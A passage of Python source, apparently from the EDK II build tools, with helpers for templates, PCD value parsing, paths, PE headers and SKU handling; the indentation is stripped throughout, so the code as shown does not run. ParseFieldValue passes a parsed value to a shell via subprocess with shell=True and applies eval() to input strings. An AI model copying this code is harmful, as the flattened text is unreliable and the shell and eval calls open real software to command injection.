# The string between ${BEGIN} and ${END} will be repeated as many times as the
# length of "placeholder_name", which is a list passed through a dict. The
# "placeholder_name" is the key name of the dict. The ${BEGIN} and ${END} can
# be not used and, in this case, the "placeholder_name" must not a list and it
# will just be replaced once.
#
class TemplateString(object):
_REPEAT_START_FLAG = "BEGIN"
_REPEAT_END_FLAG = "END"
class Section(object):
_LIST_TYPES = [type([]), type(set()), type((0,))]
def __init__(self, TemplateSection, PlaceHolderList):
self._Template = TemplateSection
self._PlaceHolderList = []
# Split the section into sub-sections according to the position of placeholders
if PlaceHolderList:
self._SubSectionList = []
SubSectionStart = 0
#
# The placeholders passed in must be in the format of
#
# PlaceHolderName, PlaceHolderStartPoint, PlaceHolderEndPoint
#
for PlaceHolder, Start, End in PlaceHolderList:
self._SubSectionList.append(TemplateSection[SubSectionStart:Start])
self._SubSectionList.append(TemplateSection[Start:End])
self._PlaceHolderList.append(PlaceHolder)
SubSectionStart = End
if SubSectionStart < len(TemplateSection):
self._SubSectionList.append(TemplateSection[SubSectionStart:])
else:
self._SubSectionList = [TemplateSection]
def __str__(self):
return self._Template + " : " + str(self._PlaceHolderList)
def Instantiate(self, PlaceHolderValues):
RepeatTime = -1
RepeatPlaceHolders = {}
NonRepeatPlaceHolders = {}
for PlaceHolder in self._PlaceHolderList:
if PlaceHolder not in PlaceHolderValues:
continue
Value = PlaceHolderValues[PlaceHolder]
if type(Value) in self._LIST_TYPES:
if RepeatTime < 0:
RepeatTime = len(Value)
elif RepeatTime != len(Value):
EdkLogger.error(
"TemplateString",
PARAMETER_INVALID,
"${%s} has different repeat time from others!" % PlaceHolder,
ExtraData=str(self._Template)
)
RepeatPlaceHolders["${%s}" % PlaceHolder] = Value
else:
NonRepeatPlaceHolders["${%s}" % PlaceHolder] = Value
if NonRepeatPlaceHolders:
StringList = []
for S in self._SubSectionList:
if S not in NonRepeatPlaceHolders:
StringList.append(S)
else:
StringList.append(str(NonRepeatPlaceHolders[S]))
else:
StringList = self._SubSectionList
if RepeatPlaceHolders:
TempStringList = []
for Index in range(RepeatTime):
for S in StringList:
if S not in RepeatPlaceHolders:
TempStringList.append(S)
else:
TempStringList.append(str(RepeatPlaceHolders[S][Index]))
StringList = TempStringList
return "".join(StringList)
## Constructor
def __init__(self, Template=None):
self.String = []
self.IsBinary = False
self._Template = Template
self._TemplateSectionList = self._Parse(Template)
## str() operator
#
# @retval string The string replaced
#
def __str__(self):
return "".join(self.String)
## Split the template string into fragments per the ${BEGIN} and ${END} flags
#
# @retval list A list of TemplateString.Section objects
#
def _Parse(self, Template):
SectionStart = 0
SearchFrom = 0
MatchEnd = 0
PlaceHolderList = []
TemplateSectionList = []
while Template:
MatchObj = gPlaceholderPattern.search(Template, SearchFrom)
if not MatchObj:
if MatchEnd <= len(Template):
TemplateSection = TemplateString.Section(Template[SectionStart:], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
break
MatchString = MatchObj.group(1)
MatchStart = MatchObj.start()
MatchEnd = MatchObj.end()
if MatchString == self._REPEAT_START_FLAG:
if MatchStart > SectionStart:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
elif MatchString == self._REPEAT_END_FLAG:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
else:
PlaceHolderList.append((MatchString, MatchStart - SectionStart, MatchEnd - SectionStart))
SearchFrom = MatchEnd
return TemplateSectionList
## Replace the string template with dictionary of placeholders and append it to previous one
#
# @param AppendString The string template to append
# @param Dictionary The placeholder dictionaries
#
def Append(self, AppendString, Dictionary=None):
if Dictionary:
SectionList = self._Parse(AppendString)
self.String.append( "".join(S.Instantiate(Dictionary) for S in SectionList))
else:
if isinstance(AppendString,list):
self.String.extend(AppendString)
else:
self.String.append(AppendString)
## Replace the string template with dictionary of placeholders
#
# @param Dictionary The placeholder dictionaries
#
# @retval str The string replaced with placeholder values
#
def Replace(self, Dictionary=None):
return "".join(S.Instantiate(Dictionary) for S in self._TemplateSectionList)
## Progress indicator class
#
# This class makes use of thread to print progress on console.
#
class Progressor:
# for avoiding deadloop
_StopFlag = None
_ProgressThread = None
_CheckInterval = 0.25
## Constructor
#
# @param OpenMessage The string printed before progress characters
# @param CloseMessage The string printed after progress characters
# @param ProgressChar The character used to indicate the progress
# @param Interval The interval in seconds between two progress characters
#
def __init__(self, OpenMessage="", CloseMessage="", ProgressChar='.', Interval=1.0):
self.PromptMessage = OpenMessage
self.CodaMessage = CloseMessage
self.ProgressChar = ProgressChar
self.Interval = Interval
if Progressor._StopFlag is None:
Progressor._StopFlag = threading.Event()
## Start to print progress character
#
# @param OpenMessage The string printed before progress characters
#
def Start(self, OpenMessage=None):
if OpenMessage is not None:
self.PromptMessage = OpenMessage
Progressor._StopFlag.clear()
if Progressor._ProgressThread is None:
Progressor._ProgressThread = threading.Thread(target=self._ProgressThreadEntry)
Progressor._ProgressThread.setDaemon(False)
Progressor._ProgressThread.start()
## Stop printing progress character
#
# @param CloseMessage The string printed after progress characters
#
def Stop(self, CloseMessage=None):
OriginalCodaMessage = self.CodaMessage
if CloseMessage is not None:
self.CodaMessage = CloseMessage
self.Abort()
self.CodaMessage = OriginalCodaMessage
## Thread entry method
def _ProgressThreadEntry(self):
sys.stdout.write(self.PromptMessage + " ")
sys.stdout.flush()
TimeUp = 0.0
while not Progressor._StopFlag.isSet():
if TimeUp <= 0.0:
sys.stdout.write(self.ProgressChar)
sys.stdout.flush()
TimeUp = self.Interval
time.sleep(self._CheckInterval)
TimeUp -= self._CheckInterval
sys.stdout.write(" " + self.CodaMessage + "\n")
sys.stdout.flush()
## Abort the progress display
@staticmethod
def Abort():
if Progressor._StopFlag is not None:
Progressor._StopFlag.set()
if Progressor._ProgressThread is not None:
Progressor._ProgressThread.join()
Progressor._ProgressThread = None
## Dictionary using prioritized list as key
#
class tdict:
_ListType = type([])
_TupleType = type(())
_Wildcard = 'COMMON'
_ValidWildcardList = ['COMMON', 'DEFAULT', 'ALL', TAB_STAR, 'PLATFORM']
def __init__(self, _Single_=False, _Level_=2):
self._Level_ = _Level_
self.data = {}
self._Single_ = _Single_
# =[] operator
def __getitem__(self, key):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
elif self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey is None or str(FirstKey).upper() in self._ValidWildcardList:
FirstKey = self._Wildcard
if self._Single_:
return self._GetSingleValue(FirstKey, RestKeys)
else:
return self._GetAllValues(FirstKey, RestKeys)
def _GetSingleValue(self, FirstKey, RestKeys):
Value = None
#print "%s-%s" % (FirstKey, self._Level_) ,
if self._Level_ > 1:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value is None:
for Key in self.data:
Value = self.data[Key][RestKeys]
if Value is not None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value is None and self._Wildcard in self.data:
#print "Value=None"
Value = self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey]
if Value is None:
for Key in self.data:
Value = self.data[Key]
if Value is not None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey]
elif self._Wildcard in self.data:
Value = self.data[self._Wildcard]
return Value
def _GetAllValues(self, FirstKey, RestKeys):
Value = []
if self._Level_ > 1:
if FirstKey == self._Wildcard:
for Key in self.data:
Value += self.data[Key][RestKeys]
else:
if FirstKey in self.data:
Value += self.data[FirstKey][RestKeys]
if self._Wildcard in self.data:
Value += self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
for Key in self.data:
Value.append(self.data[Key])
else:
if FirstKey in self.data:
Value.append(self.data[FirstKey])
if self._Wildcard in self.data:
Value.append(self.data[self._Wildcard])
return Value
## []= operator
def __setitem__(self, key, value):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
else:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey in self._ValidWildcardList:
FirstKey = self._Wildcard
if FirstKey not in self.data and self._Level_ > 0:
self.data[FirstKey] = tdict(self._Single_, self._Level_ - 1)
if self._Level_ > 1:
self.data[FirstKey][RestKeys] = value
else:
self.data[FirstKey] = value
def SetGreedyMode(self):
self._Single_ = False
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetGreedyMode()
def SetSingleMode(self):
self._Single_ = True
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetSingleMode()
def GetKeys(self, KeyIndex=0):
assert KeyIndex >= 0
if KeyIndex == 0:
return set(self.data.keys())
else:
keys = set()
for Key in self.data:
keys |= self.data[Key].GetKeys(KeyIndex - 1)
return keys
def AnalyzePcdExpression(Setting):
RanStr = ''.join(sample(string.ascii_letters + string.digits, 8))
Setting = Setting.replace('\\\\', RanStr).strip()
# There might be escaped quote in a string: \", \\\" , \', \\\'
Data = Setting
# There might be '|' in string and in ( ... | ... ), replace it with '-'
NewStr = ''
InSingleQuoteStr = False
InDoubleQuoteStr = False
Pair = 0
for Index, ch in enumerate(Data):
if ch == '"' and not InSingleQuoteStr:
if Data[Index - 1] != '\\':
InDoubleQuoteStr = not InDoubleQuoteStr
elif ch == "'" and not InDoubleQuoteStr:
if Data[Index - 1] != '\\':
InSingleQuoteStr = not InSingleQuoteStr
elif ch == '(' and not (InSingleQuoteStr or InDoubleQuoteStr):
Pair += 1
elif ch == ')' and not (InSingleQuoteStr or InDoubleQuoteStr):
Pair -= 1
if (Pair > 0 or InSingleQuoteStr or InDoubleQuoteStr) and ch == TAB_VALUE_SPLIT:
NewStr += '-'
else:
NewStr += ch
FieldList = []
StartPos = 0
while True:
Pos = NewStr.find(TAB_VALUE_SPLIT, StartPos)
if Pos < 0:
FieldList.append(Setting[StartPos:].strip())
break
FieldList.append(Setting[StartPos:Pos].strip())
StartPos = Pos + 1
for i, ch in enumerate(FieldList):
if RanStr in ch:
FieldList[i] = ch.replace(RanStr,'\\\\')
return FieldList
def ParseFieldValue (Value):
def ParseDevPathValue (Value):
if '\\' in Value:
Value.replace('\\', '/').replace(' ', '')
Cmd = 'DevicePath ' + '"' + Value + '"'
try:
p = subprocess.Popen(Cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
out, err = p.communicate()
except Exception as X:
raise BadExpression("DevicePath: %s" % (str(X)) )
finally:
subprocess._cleanup()
p.stdout.close()
p.stderr.close()
if err:
raise BadExpression("DevicePath: %s" % str(err))
out = out.decode()
Size = len(out.split())
out = ','.join(out.split())
return '{' + out + '}', Size
if "{CODE(" in Value:
return Value, len(Value.split(","))
if isinstance(Value, type(0)):
return Value, (Value.bit_length() + 7) // 8
if not isinstance(Value, type('')):
raise BadExpression('Type %s is %s' %(Value, type(Value)))
Value = Value.strip()
if Value.startswith(TAB_UINT8) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 1:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 1
if Value.startswith(TAB_UINT16) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 2:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 2
if Value.startswith(TAB_UINT32) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 4:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 4
if Value.startswith(TAB_UINT64) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 8:
raise BadExpression('Value (%s) Size larger than %d' % (Value, Size))
return Value, 8
if Value.startswith(TAB_GUID) and Value.endswith(')'):
Value = Value.split('(', 1)[1][:-1].strip()
if Value[0] == '{' and Value[-1] == '}':
TmpValue = GuidStructureStringToGuidString(Value)
if not TmpValue:
raise BadExpression("Invalid GUID value string %s" % Value)
Value = TmpValue
if Value[0] == '"' and Value[-1] == '"':
Value = Value[1:-1]
try:
Value = str(uuid.UUID(Value).bytes_le)
if Value.startswith("b'"):
Value = Value[2:-1]
Value = "'" + Value + "'"
except ValueError as Message:
raise BadExpression(Message)
Value, Size = ParseFieldValue(Value)
return Value, 16
if Value.startswith('L"') and Value.endswith('"'):
# Unicode String
# translate escape character
Value = Value[1:]
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, (len(List) + 1) * 2
if Value.startswith('"') and Value.endswith('"'):
# ASCII String
# translate escape character
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List) + 1
if Value.startswith("L'") and Value.endswith("'"):
# Unicode Character Constant
# translate escape character
Value = Value[1:]
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
if len(List) == 0:
raise BadExpression('Length %s is %s' % (Value, len(List)))
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, len(List) * 2
if Value.startswith("'") and Value.endswith("'"):
# Character constant
# translate escape character
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
if len(List) == 0:
raise BadExpression('Length %s is %s' % (Value, len(List)))
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List)
if Value.startswith('{') and Value.endswith('}'):
# Byte array
Value = Value[1:-1]
List = [Item.strip() for Item in Value.split(',')]
List.reverse()
Value = 0
RetSize = 0
for Item in List:
ItemValue, Size = ParseFieldValue(Item)
RetSize += Size
for I in range(Size):
Value = (Value << 8) | ((ItemValue >> 8 * I) & 0xff)
return Value, RetSize
if Value.startswith('DEVICE_PATH(') and Value.endswith(')'):
Value = Value.replace("DEVICE_PATH(", '').rstrip(')')
Value = Value.strip().strip('"')
return ParseDevPathValue(Value)
if Value.lower().startswith('0x'):
try:
Value = int(Value, 16)
except:
raise BadExpression("invalid hex value: %s" % Value)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) // 8
if Value[0].isdigit():
Value = int(Value, 10)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) // 8
if Value.lower() == 'true':
return 1, 1
if Value.lower() == 'false':
return 0, 1
return Value, 1
## AnalyzeDscPcd
#
# Analyze DSC PCD value, since there is no data type info in DSC
# This function is used to match functions (AnalyzePcdData) used for retrieving PCD value from database
# 1. Feature flag: TokenSpace.PcdCName|PcdValue
# 2. Fix and Patch:TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# 3. Dynamic default:
# TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# TokenSpace.PcdCName|PcdValue
# 4. Dynamic VPD:
# TokenSpace.PcdCName|VpdOffset[|VpdValue]
# TokenSpace.PcdCName|VpdOffset[|MaxSize[|VpdValue]]
# 5. Dynamic HII:
# TokenSpace.PcdCName|HiiString|VariableGuid|VariableOffset[|HiiValue]
# PCD value needs to be located in such kind of string, and the PCD value might be an expression in which
# there might have "|" operator, also in string value.
#
# @param Setting: String contain information described above with "TokenSpace.PcdCName|" stripped
# @param PcdType: PCD type: feature, fixed, dynamic default VPD HII
# @param DataType: The datum type of PCD: VOID*, UNIT, BOOL
# @retval:
# ValueList: A List contain fields described above
# IsValid: True if conforming EBNF, otherwise False
# Index: The index where PcdValue is in ValueList
#
def AnalyzeDscPcd(Setting, PcdType, DataType=''):
FieldList = AnalyzePcdExpression(Setting)
IsValid = True
if PcdType in (MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE, MODEL_PCD_DYNAMIC_DEFAULT, MODEL_PCD_DYNAMIC_EX_DEFAULT):
Value = FieldList[0]
Size = ''
if len(FieldList) > 1 and FieldList[1]:
DataType = FieldList[1]
if FieldList[1] != TAB_VOID and StructPattern.match(FieldList[1]) is None:
IsValid = False
if len(FieldList) > 2:
Size = FieldList[2]
if IsValid:
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size, 16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [str(Value), DataType, str(Size)], IsValid, 0
elif PcdType == MODEL_PCD_FEATURE_FLAG:
Value = FieldList[0]
Size = ''
IsValid = (len(FieldList) <= 1)
return [Value, DataType, str(Size)], IsValid, 0
elif PcdType in (MODEL_PCD_DYNAMIC_VPD, MODEL_PCD_DYNAMIC_EX_VPD):
VpdOffset = FieldList[0]
Value = Size = ''
if not DataType == TAB_VOID:
if len(FieldList) > 1:
Value = FieldList[1]
else:
if len(FieldList) > 1:
Size = FieldList[1]
if len(FieldList) > 2:
Value = FieldList[2]
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size, 16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [VpdOffset, str(Size), Value], IsValid, 2
elif PcdType in (MODEL_PCD_DYNAMIC_HII, MODEL_PCD_DYNAMIC_EX_HII):
IsValid = (3 <= len(FieldList) <= 5)
HiiString = FieldList[0]
Guid = Offset = Value = Attribute = ''
if len(FieldList) > 1:
Guid = FieldList[1]
if len(FieldList) > 2:
Offset = FieldList[2]
if len(FieldList) > 3:
Value = FieldList[3]
if len(FieldList) > 4:
Attribute = FieldList[4]
return [HiiString, Guid, Offset, Value, Attribute], IsValid, 3
return [], False, 0
## AnalyzePcdData
#
# Analyze the pcd Value, Datum type and TokenNumber.
# Used to avoid split issue while the value string contain "|" character
#
# @param[in] Setting: A String contain value/datum type/token number information;
#
# @retval ValueList: A List contain value, datum type and toke number.
#
def AnalyzePcdData(Setting):
ValueList = ['', '', '']
ValueRe = re.compile(r'^\s*L?\".*\|.*\"')
PtrValue = ValueRe.findall(Setting)
ValueUpdateFlag = False
if len(PtrValue) >= 1:
Setting = re.sub(ValueRe, '', Setting)
ValueUpdateFlag = True
TokenList = Setting.split(TAB_VALUE_SPLIT)
ValueList[0:len(TokenList)] = TokenList
if ValueUpdateFlag:
ValueList[0] = PtrValue[0]
return ValueList
## check format of PCD value against its the datum type
#
# For PCD value setting
#
def CheckPcdDatum(Type, Value):
if Type == TAB_VOID:
ValueRe = re.compile(r'\s*L?\".*\"\s*$')
if not (((Value.startswith('L"') or Value.startswith('"')) and Value.endswith('"'))
or (Value.startswith('{') and Value.endswith('}')) or (Value.startswith("L'") or Value.startswith("'") and Value.endswith("'"))
):
return False, "Invalid value [%s] of type [%s]; must be in the form of {...} for array"\
", \"...\" or \'...\' for string, L\"...\" or L\'...\' for unicode string" % (Value, Type)
elif ValueRe.match(Value):
# Check the chars in UnicodeString or CString is printable
if Value.startswith("L"):
Value = Value[2:-1]
else:
Value = Value[1:-1]
Printset = set(string.printable)
Printset.remove(TAB_PRINTCHAR_VT)
Printset.add(TAB_PRINTCHAR_BS)
Printset.add(TAB_PRINTCHAR_NUL)
if not set(Value).issubset(Printset):
PrintList = sorted(Printset)
return False, "Invalid PCD string value of type [%s]; must be printable chars %s." % (Type, PrintList)
elif Type == 'BOOLEAN':
if Value not in ['TRUE', 'True', 'true', '0x1', '0x01', '1', 'FALSE', 'False', 'false', '0x0', '0x00', '0']:
return False, "Invalid value [%s] of type [%s]; must be one of TRUE, True, true, 0x1, 0x01, 1"\
", FALSE, False, false, 0x0, 0x00, 0" % (Value, Type)
elif Type in [TAB_UINT8, TAB_UINT16, TAB_UINT32, TAB_UINT64]:
if Value.startswith('0') and not Value.lower().startswith('0x') and len(Value) > 1 and Value.lstrip('0'):
Value = Value.lstrip('0')
try:
if Value and int(Value, 0) < 0:
return False, "PCD can't be set to negative value[%s] for datum type [%s]" % (Value, Type)
Value = int(Value, 0)
if Value > MAX_VAL_TYPE[Type]:
return False, "Too large PCD value[%s] for datum type [%s]" % (Value, Type)
except:
return False, "Invalid value [%s] of type [%s];"\
" must be a hexadecimal, decimal or octal in C language format." % (Value, Type)
else:
return True, "StructurePcd"
return True, ""
def CommonPath(PathList):
P1 = min(PathList).split(os.path.sep)
P2 = max(PathList).split(os.path.sep)
for Index in range(min(len(P1), len(P2))):
if P1[Index] != P2[Index]:
return os.path.sep.join(P1[:Index])
return os.path.sep.join(P1)
class PathClass(object):
def __init__(self, File='', Root='', AlterRoot='', Type='', IsBinary=False,
Arch='COMMON', ToolChainFamily='', Target='', TagName='', ToolCode=''):
self.Arch = Arch
self.File = str(File)
if os.path.isabs(self.File):
self.Root = ''
self.AlterRoot = ''
else:
self.Root = str(Root)
self.AlterRoot = str(AlterRoot)
# Remove any '.' and '..' in path
if self.Root:
self.Root = mws.getWs(self.Root, self.File)
self.Path = os.path.normpath(os.path.join(self.Root, self.File))
self.Root = os.path.normpath(CommonPath([self.Root, self.Path]))
# eliminate the side-effect of 'C:'
if self.Root[-1] == ':':
self.Root += os.path.sep
# file path should not start with path separator
if self.Root[-1] == os.path.sep:
self.File = self.Path[len(self.Root):]
else:
self.File = self.Path[len(self.Root) + 1:]
else:
self.Path = os.path.normpath(self.File)
self.SubDir, self.Name = os.path.split(self.File)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.Root:
if self.SubDir:
self.Dir = os.path.join(self.Root, self.SubDir)
else:
self.Dir = self.Root
else:
self.Dir = self.SubDir
if IsBinary:
self.Type = Type
else:
self.Type = self.Ext.lower()
self.IsBinary = IsBinary
self.Target = Target
self.TagName = TagName
self.ToolCode = ToolCode
self.ToolChainFamily = ToolChainFamily
## Convert the object of this class to a string
#
# Convert member Path of the class to a string
#
# @retval string Formatted String
#
def __str__(self):
return self.Path
## Override __eq__ function
#
# Check whether PathClass are the same
#
# @retval False The two PathClass are different
# @retval True The two PathClass are the same
#
def __eq__(self, Other):
return self.Path == str(Other)
## Override __cmp__ function
#
# Customize the comparison operation of two PathClass
#
# @retval 0 The two PathClass are different
# @retval -1 The first PathClass is less than the second PathClass
# @retval 1 The first PathClass is Bigger than the second PathClass
def __cmp__(self, Other):
OtherKey = str(Other)
SelfKey = self.Path
if SelfKey == OtherKey:
return 0
elif SelfKey > OtherKey:
return 1
else:
return -1
## Override __hash__ function
#
# Use Path as key in hash table
#
# @retval string Key for hash table
#
def __hash__(self):
return hash(self.Path)
@cached_property
def Key(self):
return self.Path.upper()
@property
def TimeStamp(self):
return os.stat(self.Path)[8]
def Validate(self, Type='', CaseSensitive=True):
def RealPath2(File, Dir='', OverrideDir=''):
NewFile = None
if OverrideDir:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile:
if OverrideDir[-1] == os.path.sep:
return NewFile[len(OverrideDir):], NewFile[0:len(OverrideDir)]
else:
return NewFile[len(OverrideDir) + 1:], NewFile[0:len(OverrideDir)]
if GlobalData.gAllFiles:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(Dir, File))]
if not NewFile:
NewFile = os.path.normpath(os.path.join(Dir, File))
if not os.path.exists(NewFile):
return None, None
if NewFile:
if Dir:
if Dir[-1] == os.path.sep:
return NewFile[len(Dir):], NewFile[0:len(Dir)]
else:
return NewFile[len(Dir) + 1:], NewFile[0:len(Dir)]
else:
return NewFile, ''
return None, None
if GlobalData.gCaseInsensitive:
CaseSensitive = False
if Type and Type.lower() != self.Type:
return FILE_TYPE_MISMATCH, '%s (expect %s but got %s)' % (self.File, Type, self.Type)
RealFile, RealRoot = RealPath2(self.File, self.Root, self.AlterRoot)
if not RealRoot and not RealFile:
RealFile = self.File
if self.AlterRoot:
RealFile = os.path.join(self.AlterRoot, self.File)
elif self.Root:
RealFile = os.path.join(self.Root, self.File)
if len (mws.getPkgPath()) == 0:
return FILE_NOT_FOUND, os.path.join(self.AlterRoot, RealFile)
else:
return FILE_NOT_FOUND, "%s is not found in packages path:\n\t%s" % (self.File, '\n\t'.join(mws.getPkgPath()))
ErrorCode = 0
ErrorInfo = ''
if RealRoot != self.Root or RealFile != self.File:
if CaseSensitive and (RealFile != self.File or (RealRoot != self.Root and RealRoot != self.AlterRoot)):
ErrorCode = FILE_CASE_MISMATCH
ErrorInfo = self.File + '\n\t' + RealFile + " [in file system]"
self.SubDir, self.Name = os.path.split(RealFile)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.SubDir:
self.Dir = os.path.join(RealRoot, self.SubDir)
else:
self.Dir = RealRoot
self.File = RealFile
self.Root = RealRoot
self.Path = os.path.join(RealRoot, RealFile)
return ErrorCode, ErrorInfo
## Parse PE image to get the required PE information.
#
class PeImageClass():
## Constructor
#
# @param File FilePath of PeImage
#
def __init__(self, PeFile):
self.FileName = PeFile
self.IsValid = False
self.Size = 0
self.EntryPoint = 0
self.SectionAlignment = 0
self.SectionHeaderList = []
self.ErrorInfo = ''
try:
PeObject = open(PeFile, 'rb')
except:
self.ErrorInfo = self.FileName + ' can not be found\n'
return
# Read DOS header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x3E)
ByteList = ByteArray.tolist()
# DOS signature should be 'MZ'
if self._ByteListToStr (ByteList[0x0:0x2]) != 'MZ':
self.ErrorInfo = self.FileName + ' has no valid DOS signature MZ'
return
# Read 4 byte PE Signature
PeOffset = self._ByteListToInt(ByteList[0x3C:0x3E])
PeObject.seek(PeOffset)
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 4)
# PE signature should be 'PE\0\0'
if ByteArray.tostring() != b'PE\0\0':
self.ErrorInfo = self.FileName + ' has no valid PE signature PE00'
return
# Read PE file header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x14)
ByteList = ByteArray.tolist()
SecNumber = self._ByteListToInt(ByteList[0x2:0x4])
if SecNumber == 0:
self.ErrorInfo = self.FileName + ' has no section header'
return
# Read PE optional header
OptionalHeaderSize = self._ByteListToInt(ByteArray[0x10:0x12])
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, OptionalHeaderSize)
ByteList = ByteArray.tolist()
self.EntryPoint = self._ByteListToInt(ByteList[0x10:0x14])
self.SectionAlignment = self._ByteListToInt(ByteList[0x20:0x24])
self.Size = self._ByteListToInt(ByteList[0x38:0x3C])
# Read each Section Header
for Index in range(SecNumber):
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x28)
ByteList = ByteArray.tolist()
SecName = self._ByteListToStr(ByteList[0:8])
SecVirtualSize = self._ByteListToInt(ByteList[8:12])
SecRawAddress = self._ByteListToInt(ByteList[20:24])
SecVirtualAddress = self._ByteListToInt(ByteList[12:16])
self.SectionHeaderList.append((SecName, SecVirtualAddress, SecRawAddress, SecVirtualSize))
self.IsValid = True
PeObject.close()
def _ByteListToStr(self, ByteList):
String = ''
for index in range(len(ByteList)):
if ByteList[index] == 0:
break
String += chr(ByteList[index])
return String
def _ByteListToInt(self, ByteList):
Value = 0
for index in range(len(ByteList) - 1, -1, -1):
Value = (Value << 8) | int(ByteList[index])
return Value
class DefaultStore():
def __init__(self, DefaultStores ):
self.DefaultStores = DefaultStores
def DefaultStoreID(self, DefaultStoreName):
for key, value in self.DefaultStores.items():
if value == DefaultStoreName:
return key
return None
def GetDefaultDefault(self):
if not self.DefaultStores or "0" in self.DefaultStores:
return "0", TAB_DEFAULT_STORES_DEFAULT
else:
minvalue = min(int(value_str) for value_str in self.DefaultStores)
return (str(minvalue), self.DefaultStores[str(minvalue)])
def GetMin(self, DefaultSIdList):
if not DefaultSIdList:
return TAB_DEFAULT_STORES_DEFAULT
storeidset = {storeid for storeid, storename in self.DefaultStores.values() if storename in DefaultSIdList}
if not storeidset:
return ""
minid = min(storeidset )
for sid, name in self.DefaultStores.values():
if sid == minid:
return name
class SkuClass():
DEFAULT = 0
SINGLE = 1
MULTIPLE =2
def __init__(self,SkuIdentifier='', SkuIds=None):
if SkuIds is None:
SkuIds = {}
for SkuName in SkuIds:
SkuId = SkuIds[SkuName][0]
skuid_num = int(SkuId, 16) if SkuId.upper().startswith("0X") else int(SkuId)
if skuid_num > 0xFFFFFFFFFFFFFFFF:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] value %s exceeds the max value of UINT64"
% (SkuName, SkuId))
self.AvailableSkuIds = OrderedDict()
self.SkuIdSet = []
self.SkuIdNumberSet = []
self.SkuData = SkuIds
self._SkuInherit = {}
self._SkuIdentifier = SkuIdentifier
if SkuIdentifier == '' or SkuIdentifier is None:
self.SkuIdSet = ['DEFAULT']
self.SkuIdNumberSet = ['0U']
elif SkuIdentifier == 'ALL':
self.SkuIdSet = list(SkuIds.keys())
self.SkuIdNumberSet = [num[0].strip() + 'U' for num in SkuIds.values()]
else:
r = SkuIdentifier.split('|')
self.SkuIdSet=[(r[k].strip()).upper() for k in range(len(r))]
k = None
try:
self.SkuIdNumberSet = [SkuIds[k][0].strip() + 'U' for k in self.SkuIdSet]
except Exception:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (k, " | ".join(SkuIds.keys())))
for each in self.SkuIdSet:
if each in SkuIds:
self.AvailableSkuIds[each] = SkuIds[each][0]
else:
EdkLogger.error("build", PARAMETER_INVALID,
